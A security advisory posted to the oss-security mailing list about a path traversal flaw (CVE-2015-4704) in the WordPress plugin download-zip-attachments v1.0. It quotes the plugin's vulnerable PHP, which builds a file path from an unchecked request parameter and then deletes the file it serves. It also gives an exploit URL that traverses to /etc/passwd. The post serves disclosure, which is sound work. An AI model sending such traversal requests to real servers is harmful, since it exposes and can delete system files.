Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 23 Jun 2015 16:07:49 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: Open Source Security <oss-security@...ts.openwall.com>
Subject: Remote file download vulnerability in download-zip-attachments v1.0

Title: Remote file download vulnerability in download-zip-attachments v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-10
Download Site: https://wordpress.org/plugins/download-zip-attachments/
Vendor: rivenvirus
Vendor Notified: 2015-06-15
Vendor Contact: https://profiles.wordpress.org/rivenvirus/
Advisory: http://www.vapid.dhs.org/advisory.php?v=129
Description: 
Download all attachments from the post into a zip file.

Vulnerability:
from download-zip-attachments/download.php makes no checks to verify the download path is with in the specified upload directory.

<?php
if(isset($_REQUEST['File']) && !empty($_REQUEST['File'])){
   define('WP_USE_THEMES', false);
   require('../../../wp-load.php');    
   require "create_zip_file.php";
   $uploads = wp_upload_dir(); 
   $tmp_location = $uploads['path']."/".$_REQUEST['File'];
   //echo $tmp_location;
   $zip = new CreateZipFile;
   $zip->forceDownload($tmp_location,false);     
   unlink($tmp_location); 
   exit;
}

CVEID: 2015-4704
OSVDB:
Exploit Code:
	• http://www.example.com/wp-content/plugins/download-zip-attachments/download.php?File=../../../../../../../../etc/passwd

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ